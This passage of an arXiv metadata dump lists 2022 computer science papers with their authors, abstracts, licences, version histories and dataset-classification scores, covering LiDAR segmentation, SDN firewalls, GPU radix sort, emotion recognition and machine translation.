[
"Van Gool",
"Luc",
""
]
] |
new_dataset
| 0.999458 |
2204.09914
|
Xiaoyan Li
|
Xiaoyan Li, Gang Zhang, Hongyu Pan, Zhenhua Wang
|
CPGNet: Cascade Point-Grid Fusion Network for Real-Time LiDAR Semantic
Segmentation
|
Accepted in the 2022 IEEE International Conference on Robotics and
Automation (ICRA 2022)
| null | null | null |
cs.CV
|
http://creativecommons.org/licenses/by/4.0/
|
LiDAR semantic segmentation essential for advanced autonomous driving is
required to be accurate, fast, and easy-deployed on mobile platforms. Previous
point-based or sparse voxel-based methods are far away from real-time
applications since time-consuming neighbor searching or sparse 3D convolution
are employed. Recent 2D projection-based methods, including range view and
multi-view fusion, can run in real time, but suffer from lower accuracy due to
information loss during the 2D projection. Besides, to improve the performance,
previous methods usually adopt test time augmentation (TTA), which further
slows down the inference process. To achieve a better speed-accuracy trade-off,
we propose Cascade Point-Grid Fusion Network (CPGNet), which ensures both
effectiveness and efficiency mainly by the following two techniques: 1) the
novel Point-Grid (PG) fusion block extracts semantic features mainly on the 2D
projected grid for efficiency, while summarizes both 2D and 3D features on 3D
point for minimal information loss; 2) the proposed transformation consistency
loss narrows the gap between the single-time model inference and TTA. The
experiments on the SemanticKITTI and nuScenes benchmarks demonstrate that the
CPGNet without ensemble models or TTA is comparable with the state-of-the-art
RPVNet, while it runs 4.7 times faster.
|
[
{
"version": "v1",
"created": "Thu, 21 Apr 2022 06:56:30 GMT"
},
{
"version": "v2",
"created": "Wed, 27 Apr 2022 03:25:52 GMT"
},
{
"version": "v3",
"created": "Mon, 6 Jun 2022 07:45:59 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Li",
"Xiaoyan",
""
],
[
"Zhang",
"Gang",
""
],
[
"Pan",
"Hongyu",
""
],
[
"Wang",
"Zhenhua",
""
]
] |
new_dataset
| 0.98929 |
2205.12816
|
Ritvik Muttreja
|
Ananya Saxena, Ritvik Muttreja, Shivam Upadhyay, K. Shiv Kumar,
Venkanna U
|
P4Filter: A two level defensive mechanism against attacks in SDN using
P4
| null | null | null | null |
cs.NI
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
The advancements in networking technologies have led to a new paradigm of
controlling networks, with data plane programmability as a basis. This facility
opens up many advantages, such as flexibility in packet processing and better
network management, which leads to better security in the network. However, the
current literature lacks network security solutions concerning authentication
and preventing unauthorized access. In this work, our goal is to avoid attacks
in a two level defense mechanism (P4Filter). The first level is a dynamic
firewall logic, which blocks packets generated from an unauthorized source. The
second level is an authentication mechanism based on dynamic port knocking. The
two security levels were tested in a virtual environment with P4 based
switches. The packets arriving at the switch from unknown hosts are sent to the
controller. The controller maintains an ACL using which it assigns rules for
both the levels to allow or drop the packets. For port knocking a new random
sequence is generated for every new host. Hosts can only connect using the
correct sequence assigned to them.The tests conducted show this approach
performs better than the previous P4 based firewall approaches due to two
security levels. Moreover, it is successful in mitigating specific security
attacks by blocking unauthorized access to the network.
|
[
{
"version": "v1",
"created": "Wed, 25 May 2022 14:43:51 GMT"
},
{
"version": "v2",
"created": "Mon, 6 Jun 2022 05:42:12 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Saxena",
"Ananya",
""
],
[
"Muttreja",
"Ritvik",
""
],
[
"Upadhyay",
"Shivam",
""
],
[
"Kumar",
"K. Shiv",
""
],
[
"U",
"Venkanna",
""
]
] |
new_dataset
| 0.958153 |
2205.13600
|
Vittorio Caggiano
|
Vittorio Caggiano, Huawei Wang, Guillaume Durandau, Massimo Sartori
and Vikash Kumar
|
MyoSuite -- A contact-rich simulation suite for musculoskeletal motor
control
| null | null | null |
PMLR 168:492-507, 2022
|
cs.RO cs.AI cs.LG
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Embodied agents in continuous control domains have had limited exposure to
tasks allowing to explore musculoskeletal properties that enable agile and
nimble behaviors in biological beings. The sophistication behind
neuro-musculoskeletal control can pose new challenges for the motor learning
community. At the same time, agents solving complex neural control problems
allow impact in fields such as neuro-rehabilitation, as well as
collaborative-robotics. Human biomechanics underlies complex
multi-joint-multi-actuator musculoskeletal systems. The sensory-motor system
relies on a range of sensory-contact rich and proprioceptive inputs that define
and condition muscle actuation required to exhibit intelligent behaviors in the
physical world. Current frameworks for musculoskeletal control do not support
physiological sophistication of the musculoskeletal systems along with physical
world interaction capabilities. In addition, they are neither embedded in
complex and skillful motor tasks nor are computationally effective and scalable
to study large-scale learning paradigms. Here, we present MyoSuite -- a suite
of physiologically accurate biomechanical models of elbow, wrist, and hand,
with physical contact capabilities, which allow learning of complex and
skillful contact-rich real-world tasks. We provide diverse motor-control
challenges: from simple postural control to skilled hand-object interactions
such as turning a key, twirling a pen, rotating two balls in one hand, etc. By
supporting physiological alterations in musculoskeletal geometry (tendon
transfer), assistive devices (exoskeleton assistance), and muscle contraction
dynamics (muscle fatigue, sarcopenia), we present real-life tasks with temporal
changes, thereby exposing realistic non-stationary conditions in our tasks
which most continuous control benchmarks lack.
|
[
{
"version": "v1",
"created": "Thu, 26 May 2022 20:11:23 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Caggiano",
"Vittorio",
""
],
[
"Wang",
"Huawei",
""
],
[
"Durandau",
"Guillaume",
""
],
[
"Sartori",
"Massimo",
""
],
[
"Kumar",
"Vikash",
""
]
] |
new_dataset
| 0.993928 |
2205.15659
|
Petar Veli\v{c}kovi\'c
|
Petar Veli\v{c}kovi\'c, Adri\`a Puigdom\`enech Badia, David Budden,
Razvan Pascanu, Andrea Banino, Misha Dashevskiy, Raia Hadsell, Charles
Blundell
|
The CLRS Algorithmic Reasoning Benchmark
|
To appear in ICML 2022. 19 pages, 4 figures
| null | null | null |
cs.LG cs.DS stat.ML
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Learning representations of algorithms is an emerging area of machine
learning, seeking to bridge concepts from neural networks with classical
algorithms. Several important works have investigated whether neural networks
can effectively reason like algorithms, typically by learning to execute them.
The common trend in the area, however, is to generate targeted kinds of
algorithmic data to evaluate specific hypotheses, making results hard to
transfer across publications, and increasing the barrier of entry. To
consolidate progress and work towards unified evaluation, we propose the CLRS
Algorithmic Reasoning Benchmark, covering classical algorithms from the
Introduction to Algorithms textbook. Our benchmark spans a variety of
algorithmic reasoning procedures, including sorting, searching, dynamic
programming, graph algorithms, string algorithms and geometric algorithms. We
perform extensive experiments to demonstrate how several popular algorithmic
reasoning baselines perform on these tasks, and consequently, highlight links
to several open challenges. Our library is readily available at
https://github.com/deepmind/clrs.
|
[
{
"version": "v1",
"created": "Tue, 31 May 2022 09:56:44 GMT"
},
{
"version": "v2",
"created": "Sat, 4 Jun 2022 14:42:42 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Veličković",
"Petar",
""
],
[
"Badia",
"Adrià Puigdomènech",
""
],
[
"Budden",
"David",
""
],
[
"Pascanu",
"Razvan",
""
],
[
"Banino",
"Andrea",
""
],
[
"Dashevskiy",
"Misha",
""
],
[
"Hadsell",
"Raia",
""
],
[
"Blundell",
"Charles",
""
]
] |
new_dataset
| 0.986069 |
2206.01777
|
Jie Cai
|
Jie Cai, Zibo Meng, Jiaming Ding, and Chiu Man Ho
|
Real-Time Super-Resolution for Real-World Images on Mobile Devices
|
arXiv admin note: text overlap with arXiv:2004.13674
| null | null | null |
cs.CV eess.IV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Image Super-Resolution (ISR), which aims at recovering High-Resolution (HR)
images from the corresponding Low-Resolution (LR) counterparts. Although recent
progress in ISR has been remarkable. However, they are way too computationally
intensive to be deployed on edge devices, since most of the recent approaches
are deep learning-based. Besides, these methods always fail in real-world
scenes, since most of them adopt a simple fixed "ideal" bicubic downsampling
kernel from high-quality images to construct LR/HR training pairs which may
lose track of frequency-related details. In this work, an approach for
real-time ISR on mobile devices is presented, which is able to deal with a wide
range of degradations in real-world scenarios. Extensive experiments on
traditional super-resolution datasets (Set5, Set14, BSD100, Urban100, Manga109,
DIV2K) and real-world images with a variety of degradations demonstrate that
our method outperforms the state-of-art methods, resulting in higher PSNR and
SSIM, lower noise and better visual quality. Most importantly, our method
achieves real-time performance on mobile or edge devices.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 18:44:53 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Cai",
"Jie",
""
],
[
"Meng",
"Zibo",
""
],
[
"Ding",
"Jiaming",
""
],
[
"Ho",
"Chiu Man",
""
]
] |
new_dataset
| 0.983031 |
2206.01784
|
Andrey Adinets
|
Andy Adinets and Duane Merrill
|
Onesweep: A Faster Least Significant Digit Radix Sort for GPUs
|
12 pages, 11 figures, 2 tables
| null | null | null |
cs.DC cs.DS
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
We present Onesweep, a least-significant digit (LSD) radix sorting algorithm
for large GPU sorting problems residing in global memory. Our parallel
algorithm employs a method of single-pass prefix sum that only requires ~2n
global read/write operations for each digit-binning iteration. This exhibits a
significant reduction in last-level memory traffic versus contemporary GPU
radix sorting implementations, where each iteration of digit binning requires
two passes through the dataset totaling ~3n global memory operations.
On the NVIDIA A100 GPU, our approach achieves 29.4 GKey/s when sorting 256M
random 32-bit keys. Compared to CUB, the current state-of-the-art GPU LSD radix
sort, our approach provides a speedup of ~1.5x. For 32-bit keys with varied
distributions, our approach provides more consistent performance compared to
HRS, the current state-of-the-art GPU MSD radix sort, and outperforms it in
almost all cases.
|
[
{
"version": "v1",
"created": "Fri, 3 Jun 2022 19:08:55 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Adinets",
"Andy",
""
],
[
"Merrill",
"Duane",
""
]
] |
new_dataset
| 0.998599 |
2206.01867
|
Zihan Wang
|
Zihan Wang, Ruimin Chen, Mengxuan Liu, Guanfang Dong and Anup Basu
|
SPGNet: Spatial Projection Guided 3D Human Pose Estimation in Low
Dimensional Space
| null | null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We propose a method SPGNet for 3D human pose estimation that mixes
multi-dimensional re-projection into supervised learning. In this method, the
2D-to-3D-lifting network predicts the global position and coordinates of the 3D
human pose. Then, we re-project the estimated 3D pose back to the 2D key points
along with spatial adjustments. The loss functions compare the estimated 3D
pose with the 3D pose ground truth, and re-projected 2D pose with the input 2D
pose. In addition, we propose a kinematic constraint to restrict the predicted
target with constant human bone length. Based on the estimation results for the
dataset Human3.6M, our approach outperforms many state-of-the-art methods both
qualitatively and quantitatively.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 00:51:00 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Wang",
"Zihan",
""
],
[
"Chen",
"Ruimin",
""
],
[
"Liu",
"Mengxuan",
""
],
[
"Dong",
"Guanfang",
""
],
[
"Basu",
"Anup",
""
]
] |
new_dataset
| 0.997544 |
2206.01908
|
Danyang Tu
|
Danyang Tu and Wei Sun and Xiongkuo Min and Guangtao Zhai and Wei Shen
|
Video-based Human-Object Interaction Detection from Tubelet Tokens
| null | null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We present a novel vision Transformer, named TUTOR, which is able to learn
tubelet tokens, served as highly-abstracted spatiotemporal representations, for
video-based human-object interaction (V-HOI) detection. The tubelet tokens
structurize videos by agglomerating and linking semantically-related patch
tokens along spatial and temporal domains, which enjoy two benefits: 1)
Compactness: each tubelet token is learned by a selective attention mechanism
to reduce redundant spatial dependencies from others; 2) Expressiveness: each
tubelet token is enabled to align with a semantic instance, i.e., an object or
a human, across frames, thanks to agglomeration and linking. The effectiveness
and efficiency of TUTOR are verified by extensive experiments. Results shows
our method outperforms existing works by large margins, with a relative mAP
gain of $16.14\%$ on VidHOI and a 2 points gain on CAD-120 as well as a $4
\times$ speedup.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 04:27:59 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Tu",
"Danyang",
""
],
[
"Sun",
"Wei",
""
],
[
"Min",
"Xiongkuo",
""
],
[
"Zhai",
"Guangtao",
""
],
[
"Shen",
"Wei",
""
]
] |
new_dataset
| 0.973539 |
2206.01916
|
Gil Avraham
|
Gil Avraham, Julian Straub, Tianwei Shen, Tsun-Yi Yang, Hugo Germain,
Chris Sweeney, Vasileios Balntas, David Novotny, Daniel DeTone, Richard
Newcombe
|
Nerfels: Renderable Neural Codes for Improved Camera Pose Estimation
|
Published at CVPRW with supplementary material
| null | null | null |
cs.CV
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
This paper presents a framework that combines traditional keypoint-based
camera pose optimization with an invertible neural rendering mechanism. Our
proposed 3D scene representation, Nerfels, is locally dense yet globally
sparse. As opposed to existing invertible neural rendering systems which
overfit a model to the entire scene, we adopt a feature-driven approach for
representing scene-agnostic, local 3D patches with renderable codes. By
modelling a scene only where local features are detected, our framework
effectively generalizes to unseen local regions in the scene via an optimizable
code conditioning mechanism in the neural renderer, all while maintaining the
low memory footprint of a sparse 3D map representation. Our model can be
incorporated to existing state-of-the-art hand-crafted and learned local
feature pose estimators, yielding improved performance when evaluating on
ScanNet for wide camera baseline scenarios.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 06:29:46 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Avraham",
"Gil",
""
],
[
"Straub",
"Julian",
""
],
[
"Shen",
"Tianwei",
""
],
[
"Yang",
"Tsun-Yi",
""
],
[
"Germain",
"Hugo",
""
],
[
"Sweeney",
"Chris",
""
],
[
"Balntas",
"Vasileios",
""
],
[
"Novotny",
"David",
""
],
[
"DeTone",
"Daniel",
""
],
[
"Newcombe",
"Richard",
""
]
] |
new_dataset
| 0.999423 |
2206.01972
|
Jianing Bai
|
Jianing Bai, Tianhao Zhang, Guangming Xie
|
MACC: Cross-Layer Multi-Agent Congestion Control with Deep Reinforcement
Learning
|
7 pages, 8 figures
| null | null | null |
cs.NI cs.AI
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Congestion Control (CC), as the core networking task to efficiently utilize
network capacity, received great attention and widely used in various Internet
communication applications such as 5G, Internet-of-Things, UAN, and more.
Various CC algorithms have been proposed both on network and transport layers
such as Active Queue Management (AQM) algorithm and Transmission Control
Protocol (TCP) congestion control mechanism. But it is hard to model dynamic
AQM/TCP system and cooperate two algorithms to obtain excellent performance
under different communication scenarios. In this paper, we explore the
performance of multi-agent reinforcement learning-based cross-layer congestion
control algorithms and present cooperation performance of two agents, known as
MACC (Multi-agent Congestion Control). We implement MACC in NS3. The simulation
results show that our scheme outperforms other congestion control combination
in terms of throughput and delay, etc. Not only does it proves that networking
protocols based on multi-agent deep reinforcement learning is efficient for
communication managing, but also verifies that networking area can be used as
new playground for machine learning algorithms.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 12:02:35 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Bai",
"Jianing",
""
],
[
"Zhang",
"Tianhao",
""
],
[
"Xie",
"Guangming",
""
]
] |
new_dataset
| 0.988947 |
2206.01978
|
Rony Ginosar
|
Rony Ginosar and Amit Zoran
|
Inbetween: Visual Selection in Parametric Design
|
tool can be found at https://ronyginosar.github.io/parametricSpecimen
| null | null | null |
cs.HC
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
The act of selection plays a leading role in the design process and in the
definition of personal style. This work introduces visual selection catalogs
into parametric design environments. A two-fold contribution is presented: (i)
guidelines for construction of a minimal-bias visual selection catalog from a
parametric space, and (ii) Inbetween, a catalog for a parametric typeface that
adheres to the guidelines, allows for font selection from a continuous design
space, and enables the investigation of personal style. A user study conducted
among graphic designers, revealed self-coherent characteristics in selection
patterns, and a high correlation in selection patterns within tasks. These
findings suggest that such patterns reflect personal user styles, formalizing
the style selection process as traversals of decision trees. Together, our
guidelines and catalog aid in making visual selection a key building block in
the digital creation process and validate selection processes as a measure of
personal style.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 12:29:10 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Ginosar",
"Rony",
""
],
[
"Zoran",
"Amit",
""
]
] |
new_dataset
| 0.993829 |
2206.01987
|
Anna Berdichevskaia
|
Anna Berdichevskaia (NUST "MISiS")
|
Atypical lexical abbreviations identification in Russian medical texts
| null | null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by-sa/4.0/
|
Abbreviation is a method of word formation that aims to construct the
shortened term from the first letters of the initial phrase. Implicit
abbreviations frequently cause the comprehension difficulties for unprepared
readers. In this paper, we propose an efficient ML-based algorithm which allows
to identify the abbreviations in Russian texts. The method achieves ROC AUC
score 0.926 and F1 score 0.706 which are confirmed as competitive in comparison
with the baselines. Along with the pipeline, we also establish first to our
knowledge Russian dataset that is relevant for the desired task.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 13:16:08 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Berdichevskaia",
"Anna",
"",
"NUST \"MISiS\""
]
] |
new_dataset
| 0.995468 |
2206.02002
|
Sachin Mehta
|
Sachin Mehta and Farzad Abdolhosseini and Mohammad Rastegari
|
CVNets: High Performance Library for Computer Vision
|
Technical report
| null | null | null |
cs.CV cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We introduce CVNets, a high-performance open-source library for training deep
neural networks for visual recognition tasks, including classification,
detection, and segmentation. CVNets supports image and video understanding
tools, including data loading, data transformations, novel data sampling
methods, and implementations of several standard networks with similar or
better performance than previous studies.
Our source code is available at: \url{https://github.com/apple/ml-cvnets}.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 14:55:24 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Mehta",
"Sachin",
""
],
[
"Abdolhosseini",
"Farzad",
""
],
[
"Rastegari",
"Mohammad",
""
]
] |
new_dataset
| 0.999606 |
2206.02015
|
Zhan Xu
|
Zhan Xu, Matthew Fisher, Yang Zhou, Deepali Aneja, Rushikesh Dudhat,
Li Yi, Evangelos Kalogerakis
|
APES: Articulated Part Extraction from Sprite Sheets
| null | null | null | null |
cs.CV cs.GR
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Rigged puppets are one of the most prevalent representations to create 2D
character animations. Creating these puppets requires partitioning characters
into independently moving parts. In this work, we present a method to
automatically identify such articulated parts from a small set of character
poses shown in a sprite sheet, which is an illustration of the character that
artists often draw before puppet creation. Our method is trained to infer
articulated parts, e.g. head, torso and limbs, that can be re-assembled to best
reconstruct the given poses. Our results demonstrate significantly better
performance than alternatives qualitatively and quantitatively.Our project page
https://zhan-xu.github.io/parts/ includes our code and data.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 15:44:04 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Xu",
"Zhan",
""
],
[
"Fisher",
"Matthew",
""
],
[
"Zhou",
"Yang",
""
],
[
"Aneja",
"Deepali",
""
],
[
"Dudhat",
"Rushikesh",
""
],
[
"Yi",
"Li",
""
],
[
"Kalogerakis",
"Evangelos",
""
]
] |
new_dataset
| 0.995469 |
2206.02093
|
Jinchuan Tian
|
Jinchuan Tian, Jianwei Yu, Chunlei Zhang, Chao Weng, Yuexian Zou, Dong
Yu
|
LAE: Language-Aware Encoder for Monolingual and Multilingual ASR
| null | null | null | null |
cs.CL cs.AI
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Despite the rapid progress in automatic speech recognition (ASR) research,
recognizing multilingual speech using a unified ASR system remains highly
challenging. Previous works on multilingual speech recognition mainly focus on
two directions: recognizing multiple monolingual speech or recognizing
code-switched speech that uses different languages interchangeably within a
single utterance. However, a pragmatic multilingual recognizer is expected to
be compatible with both directions. In this work, a novel language-aware
encoder (LAE) architecture is proposed to handle both situations by
disentangling language-specific information and generating frame-level
language-aware representations during encoding. In the LAE, the primary
encoding is implemented by the shared block while the language-specific blocks
are used to extract specific representations for each language. To learn
language-specific information discriminatively, a language-aware training
method is proposed to optimize the language-specific blocks in LAE. Experiments
conducted on Mandarin-English code-switched speech suggest that the proposed
LAE is capable of discriminating different languages in frame-level and shows
superior performance on both monolingual and multilingual ASR tasks. With
either a real-recorded or simulated code-switched dataset, the proposed LAE
achieves statistically significant improvements on both CTC and neural
transducer systems. Code is released
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 04:03:12 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Tian",
"Jinchuan",
""
],
[
"Yu",
"Jianwei",
""
],
[
"Zhang",
"Chunlei",
""
],
[
"Weng",
"Chao",
""
],
[
"Zou",
"Yuexian",
""
],
[
"Yu",
"Dong",
""
]
] |
new_dataset
| 0.996922 |
2206.02100
|
Divya Raghunathan
|
Divya Raghunathan, Ryan Beckett, Aarti Gupta, David Walker
|
ACORN: Network Control Plane Abstraction using Route Nondeterminism
|
23 pages, 10 figures
| null | null | null |
cs.NI
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Networks are hard to configure correctly, and misconfigurations occur
frequently, leading to outages or security breaches. Formal verification
techniques have been applied to guarantee the correctness of network
configurations, thereby improving network reliability. This work addresses
verification of distributed network control planes, with two distinct
contributions to improve the scalability of formal verification. Our first
contribution is a hierarchy of abstractions of varying precision which
introduce nondeterminism into the route selection procedure that routers use to
select the best available route. We prove the soundness of these abstractions
and show their benefits. Our second contribution is a novel SMT encoding which
uses symbolic graphs to encode all possible stable routing trees that are
compliant with the given network control plane configurations. We have
implemented our abstractions and SMT encodings in a prototype tool called
ACORN. Our evaluations show that our abstractions can provide significant
relative speedups (up to 323x) in performance, and ACORN can scale up to
$\approx37,000$ routers (organized in FatTree topologies, with synthesized
shortest-path routing and valley-free policies) for verifying reachability.
This far exceeds the performance of existing tools for control plane
verification.
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 05:29:26 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Raghunathan",
"Divya",
""
],
[
"Beckett",
"Ryan",
""
],
[
"Gupta",
"Aarti",
""
],
[
"Walker",
"David",
""
]
] |
new_dataset
| 0.999467 |
2206.02119
|
Apoorva Nunna
|
Anupama Ray, Shubham Mishra, Apoorva Nunna, Pushpak Bhattacharyya
|
A Multimodal Corpus for Emotion Recognition in Sarcasm
| null | null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by/4.0/
|
While sentiment and emotion analysis have been studied extensively, the
relationship between sarcasm and emotion has largely remained unexplored. A
sarcastic expression may have a variety of underlying emotions. For example, "I
love being ignored" belies sadness, while "my mobile is fabulous with a battery
backup of only 15 minutes!" expresses frustration. Detecting the emotion behind
a sarcastic expression is non-trivial yet an important task. We undertake the
task of detecting the emotion in a sarcastic statement, which to the best of
our knowledge, is hitherto unexplored. We start with the recently released
multimodal sarcasm detection dataset (MUStARD) pre-annotated with 9 emotions.
We identify and correct 343 incorrect emotion labels (out of 690). We double
the size of the dataset, label it with emotions along with valence and arousal
which are important indicators of emotional intensity. Finally, we label each
sarcastic utterance with one of the four sarcasm types-Propositional, Embedded,
Likeprefixed and Illocutionary, with the goal of advancing sarcasm detection
research. Exhaustive experimentation with multimodal (text, audio, and video)
fusion models establishes a benchmark for exact emotion recognition in sarcasm
and outperforms the state-of-art sarcasm detection. We release the dataset
enriched with various annotations and the code for research purposes:
https://github.com/apoorva-nunna/MUStARD_Plus_Plus
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 08:01:09 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Ray",
"Anupama",
""
],
[
"Mishra",
"Shubham",
""
],
[
"Nunna",
"Apoorva",
""
],
[
"Bhattacharyya",
"Pushpak",
""
]
] |
new_dataset
| 0.995066 |
2206.02120
|
Ao Wang
|
Ao Wang, Wei Li, Xin Wu, Zhanchao Huang, and Ran Tao
|
MPANet: Multi-Patch Attention For Infrared Small Target object Detection
|
4 pages 3 figures
|
2022IGARSS
| null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Infrared small target detection (ISTD) has attracted widespread attention and
been applied in various fields. Due to the small size of infrared targets and
the noise interference from complex backgrounds, the performance of ISTD using
convolutional neural networks (CNNs) is restricted. Moreover, the constriant
that long-distance dependent features can not be encoded by the vanilla CNNs
also impairs the robustness of capturing targets' shapes and locations in
complex scenarios. To this end, a multi-patch attention network (MPANet) based
on the axial-attention encoder and the multi-scale patch branch (MSPB)
structure is proposed. Specially, an axial-attention-improved encoder
architecture is designed to highlight the effective features of small targets
and suppress background noises. Furthermore, the developed MSPB structure fuses
the coarse-grained and fine-grained features from different semantic scales.
Extensive experiments on the SIRST dataset show the superiority performance and
effectiveness of the proposed MPANet compared to the state-of-the-art methods.
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 08:01:38 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Wang",
"Ao",
""
],
[
"Li",
"Wei",
""
],
[
"Wu",
"Xin",
""
],
[
"Huang",
"Zhanchao",
""
],
[
"Tao",
"Ran",
""
]
] |
new_dataset
| 0.999701 |
2206.02127
|
Xinyu Hu
|
Xinyu Hu, Tanmay Binaykiya, Eric Frank, Olcay Cirit
|
DeeprETA: An ETA Post-processing System at Scale
| null | null | null | null |
cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Estimated Time of Arrival (ETA) plays an important role in delivery and
ride-hailing platforms. For example, Uber uses ETAs to calculate fares,
estimate pickup times, match riders to drivers, plan deliveries, and more.
Commonly used route planning algorithms predict an ETA conditioned on the best
available route, but such ETA estimates can be unreliable when the actual route
taken is not known in advance. In this paper, we describe an ETA
post-processing system in which a deep residual ETA network (DeeprETA) refines
naive ETAs produced by a route planning algorithm. Offline experiments and
online tests demonstrate that post-processing by DeeprETA significantly
improves upon the accuracy of naive ETAs as measured by mean and median
absolute error. We further show that post-processing by DeeprETA attains lower
error than competitive baseline regression models.
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 08:51:49 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Hu",
"Xinyu",
""
],
[
"Binaykiya",
"Tanmay",
""
],
[
"Frank",
"Eric",
""
],
[
"Cirit",
"Olcay",
""
]
] |
new_dataset
| 0.989185 |
2206.02187
|
Pankaj Wasnik
|
Vishal Chudasama, Purbayan Kar, Ashish Gudmalwar, Nirmesh Shah, Pankaj
Wasnik, Naoyuki Onoe
|
M2FNet: Multi-modal Fusion Network for Emotion Recognition in
Conversation
|
Accepted for publication in the 5th Multimodal Learning and
Applications (MULA) Workshop at CVPR 2022
| null | null | null |
cs.CV cs.SD eess.AS
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Emotion Recognition in Conversations (ERC) is crucial in developing
sympathetic human-machine interaction. In conversational videos, emotion can be
present in multiple modalities, i.e., audio, video, and transcript. However,
due to the inherent characteristics of these modalities, multi-modal ERC has
always been considered a challenging undertaking. Existing ERC research focuses
mainly on using text information in a discussion, ignoring the other two
modalities. We anticipate that emotion recognition accuracy can be improved by
employing a multi-modal approach. Thus, in this study, we propose a Multi-modal
Fusion Network (M2FNet) that extracts emotion-relevant features from visual,
audio, and text modality. It employs a multi-head attention-based fusion
mechanism to combine emotion-rich latent representations of the input data. We
introduce a new feature extractor to extract latent features from the audio and
visual modality. The proposed feature extractor is trained with a novel
adaptive margin-based triplet loss function to learn emotion-relevant features
from the audio and visual data. In the domain of ERC, the existing methods
perform well on one benchmark dataset but not on others. Our results show that
the proposed M2FNet architecture outperforms all other methods in terms of
weighted average F1 score on well-known MELD and IEMOCAP datasets and sets a
new state-of-the-art performance in ERC.
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 14:18:58 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Chudasama",
"Vishal",
""
],
[
"Kar",
"Purbayan",
""
],
[
"Gudmalwar",
"Ashish",
""
],
[
"Shah",
"Nirmesh",
""
],
[
"Wasnik",
"Pankaj",
""
],
[
"Onoe",
"Naoyuki",
""
]
] |
new_dataset
| 0.967528 |
2206.02230
|
Alexander Jones
|
Alex Jones
|
Finetuning a Kalaallisut-English machine translation system using
web-crawled data
| null | null | null | null |
cs.CL cs.AI
|
http://creativecommons.org/licenses/by-sa/4.0/
|
West Greenlandic, known by native speakers as Kalaallisut, is an extremely
low-resource polysynthetic language spoken by around 56,000 people in
Greenland. Here, we attempt to finetune a pretrained Kalaallisut-to-English
neural machine translation (NMT) system using web-crawled pseudoparallel
sentences from around 30 multilingual websites. We compile a corpus of over
93,000 Kalaallisut sentences and over 140,000 Danish sentences, then use
cross-lingual sentence embeddings and approximate nearest-neighbors search in
an attempt to mine near-translations from these corpora. Finally, we translate
the Danish sentence to English to obtain a synthetic Kalaallisut-English
aligned corpus. Although the resulting dataset is too small and noisy to
improve the pretrained MT model, we believe that with additional resources, we
could construct a better pseudoparallel corpus and achieve more promising
results on MT. We also note other possible uses of the monolingual Kalaallisut
data and discuss directions for future work. We make the code and data for our
experiments publicly available.
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 17:56:55 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Jones",
"Alex",
""
]
] |
new_dataset
| 0.999708 |
2206.02281
|
Zhenyu Wu
|
Zhenyu Hu, Zhenyu Wu, Pengcheng Pi, Yunhe Xue, Jiayi Shen, Jianchao
Tan, Xiangru Lian, Zhangyang Wang, and Ji Liu
|
E^2VTS: Energy-Efficient Video Text Spotting from Unmanned Aerial
Vehicles
| null | null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Unmanned Aerial Vehicles (UAVs) based video text spotting has been
extensively used in civil and military domains. UAV's limited battery capacity
motivates us to develop an energy-efficient video text spotting solution. In
this paper, we first revisit RCNN's crop & resize training strategy and
empirically find that it outperforms aligned RoI sampling on a real-world video
